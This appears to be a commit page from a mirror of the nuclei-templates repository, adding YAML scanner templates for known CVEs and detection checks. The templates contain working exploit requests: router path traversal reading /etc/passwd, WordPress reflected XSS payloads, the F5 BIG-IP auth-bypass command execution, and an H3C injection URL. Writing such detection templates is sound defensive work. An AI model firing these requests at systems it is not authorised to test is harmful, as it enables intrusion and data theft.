daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-05-12 10:04:40 -04:00 committed by GitHub
parent 67635d8bb1 3e590eba7b
commit 9c32a74548
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 332 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
.new-additions
View File

@ -1,10 +1,19 @@
cves/2018/CVE-2018-19326.yaml
cves/2020/CVE-2020-36510.yaml
cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-1040.yaml
cves/2022/CVE-2022-1221.yaml
cves/2022/CVE-2022-29548.yaml cves/2022/CVE-2022-29548.yaml
exposed-panels/privx-panel.yaml exposed-panels/privx-panel.yaml
exposed-panels/umbraco-login.yaml exposed-panels/umbraco-login.yaml
exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml
exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml
exposures/configs/msmtp-config.yaml exposures/configs/msmtp-config.yaml
misconfiguration/unauthorized-h3csecparh-login.yaml
technologies/cloudflare-nginx-detect.yaml
technologies/dedecms-detect.yaml
technologies/ecology-detect.yaml technologies/ecology-detect.yaml
technologies/jspxcms-detect.yaml technologies/jspxcms-detect.yaml
vulnerabilities/other/ecsimagingpacs-rce.yaml
vulnerabilities/wordpress/age-gate-open-redirect.yaml vulnerabilities/wordpress/age-gate-open-redirect.yaml
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
vulnerabilities/wordpress/wp-security-open-redirect.yaml vulnerabilities/wordpress/wp-security-open-redirect.yaml

2
cves/2010/CVE-2010-2861.yaml
View File

@ -11,6 +11,8 @@ info:
classification: classification:
cve-id: CVE-2010-2861 cve-id: CVE-2010-2861
remediation: Upgrade to a supported version. remediation: Upgrade to a supported version.
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2010,coldfusion,lfi,adobe tags: cve,cve2010,coldfusion,lfi,adobe
requests: requests:

2
cves/2018/CVE-2018-15961.yaml
View File

@ -13,6 +13,8 @@ info:
cvss-score: 9.8 cvss-score: 9.8
cve-id: CVE-2018-15961 cve-id: CVE-2018-15961
cwe-id: CWE-434 cwe-id: CWE-434
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2018,adobe,rce,coldfusion,fileupload tags: cve,cve2018,adobe,rce,coldfusion,fileupload
requests: requests:

37
cves/2018/CVE-2018-19326.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2018-19326
info:
name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
author: 0x_Akoko
severity: high
description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files.
reference:
- https://www.exploit-db.com/exploits/45904
- https://www.cybersecurity-help.cz/vdb/SB2018120309
- https://www.zyxel.com/homepage.shtml
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19326
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"VMG1312-B10D"
tags: cve,cve2018,zyxel,lfi,modem,router
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"

40
cves/2020/CVE-2020-36510.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2020-36510
info:
name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting
author: veshraj
severity: medium
description: |
The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cb_s_a AJAX action, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-36510
cwe-id: CWE-79
metadata:
verified: false
tags: xss,wordpress,wp-theme,wp,cve,cve2020
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
cves/2022/CVE-2022-1221.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2022-1221
info:
name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting
author: veshraj
severity: medium
description: |
The plugin does not sanitise and escape some parameters before outputting them back in attributes, leading to a Reflected Cross-Site Scripting.
reference:
- https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
metadata:
verified: true
tags: xss,wordpress,wp-plugin,wp,cve,cve2022
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script> popup-"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

38
cves/2022/CVE-2022-1388.yaml
View File

@ -1,18 +1,18 @@
id: CVE-2022-1388 id: CVE-2022-1388
info: info:
name: F5 BIG-IP iControl REST Auth Bypass RCE name: F5 BIG-IP iControl - REST Auth Bypass RCE
author: dwisiswant0 author: dwisiswant0,Ph33r
severity: critical severity: critical
description: | description: |
This vulnerability may allow an unauthenticated attacker This F5 BIG-IP vulnerability can allow an unauthenticated attacker
with network access to the BIG-IP system through the management with network access to the BIG-IP system through the management
port and/or self IP addresses to execute arbitrary system commands, port and/or self IP addresses to execute arbitrary system commands.
create or delete files, or disable services. There is no data plane
exposure; this is a control plane issue only.
reference: reference:
- https://twitter.com/GossiTheDog/status/1523566937414193153 - https://twitter.com/GossiTheDog/status/1523566937414193153
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
- https://support.f5.com/csp/article/K23605346 - https://support.f5.com/csp/article/K23605346
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80 cvss-score: 9.80
@ -21,7 +21,7 @@ info:
metadata: metadata:
shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server" shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
verified: true verified: true
tags: bigip,cve,cve2022,rce,mirai tags: f5,bigip,cve,cve2022,rce,mirai
variables: variables:
auth: "admin:" auth: "admin:"
@ -38,12 +38,32 @@ requests:
{ {
"command": "run", "command": "run",
"utilCmdArgs": "-c id" "utilCmdArgs": "-c '{{cmd}}'"
} }
- |
POST /mgmt/tm/util/bash HTTP/1.1
Host: localhost
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
{
"command": "run",
"utilCmdArgs": "-c '{{cmd}}'"
}
payloads:
cmd:
- 'echo CVE-2022-1388 | rev'
stop-at-first-match: true
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "commandResult" - "commandResult"
- "uid=" - "8831-2202-EVC"
condition: and condition: and

6
cves/2022/CVE-2022-25323.yaml
View File

@ -26,7 +26,11 @@ requests:
part: body part: body
words: words:
- 'back<img src=x onerror=alert(document.domain)>' - 'back<img src=x onerror=alert(document.domain)>'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status - type: status
status: status:

28
exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml Normal file
View File

@ -0,0 +1,28 @@
id: zyxel-vmg1312b10d-login
info:
name: ZYXEL VMG1312-B10D Login Detect
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.html:"VMG1312-B10D"
tags: tech,zyxel,modem,router
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "VMG1312-B10D"
- "Welcome to the Web-Based Configurator"
condition: and
- type: status
status:
- 401

26
exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: zyxel-vsg1432b101-login
info:
name: ZYXEL VSG1432-B101 Login Detect
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.html:"VSG1432-B101"
tags: tech,zyxel,modem,router
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Welcome to ZyXEL VSG1432-B101::"
- type: status
status:
- 200

30
misconfiguration/unauthorized-h3csecparh-login.yaml Normal file
View File

@ -0,0 +1,30 @@
id: unauthorized-h3csecparh-login
info:
name: Unauthorized H3C Secparh Login
author: ritikchaddha
severity: high
metadata:
verified: true
shodan-query: http.html:"H3C-SecPath-运维审计系统"
fofa-query: app="H3C-SecPath-运维审计系统" && body="2018"
tags: h3c,default-login,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "admin"
- "审计管理员"
- "错误的id"
condition: and
- type: status
status:
- 200

28
technologies/cloudflare-nginx-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: cloudflare-nginx-detect
info:
name: Cloudflare Nginx Detect
author: idealphase
severity: info
reference:
- https://blog.cloudflare.com/end-of-the-road-for-cloudflare-nginx/
metadata:
verified: true
shodan-query: product:"cloudflare-nginx"
tags: cloudflare,nginx,tech
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Server: cloudflare-nginx"
- type: status
status:
- 200

31
technologies/dedecms-detect.yaml Normal file
View File

@ -0,0 +1,31 @@
id: dedecms-detect
info:
name: DedeCMS Detect
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: title:"dedecms" || http.html:"power by dedecms"
tags: dedecms,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Power by DedeCms"
- "DedeCMS演示站"
- "DedeCMS"
condition: or
- type: status
status:
- 200

26
vulnerabilities/other/ecsimagingpacs-rce.yaml Normal file
View File

@ -0,0 +1,26 @@
id: ecsimagingpacs-rce
info:
name: ECSIMAGING PACS 6.21.5 - Remote code execution
author: ritikchaddha
severity: critical
description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
reference: https://www.exploit-db.com/exploits/49388
metadata:
verified: false
tags: ecsimagingpacs,rce
requests:
- method: GET
path:
- "{{BaseURL}}/showfile.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200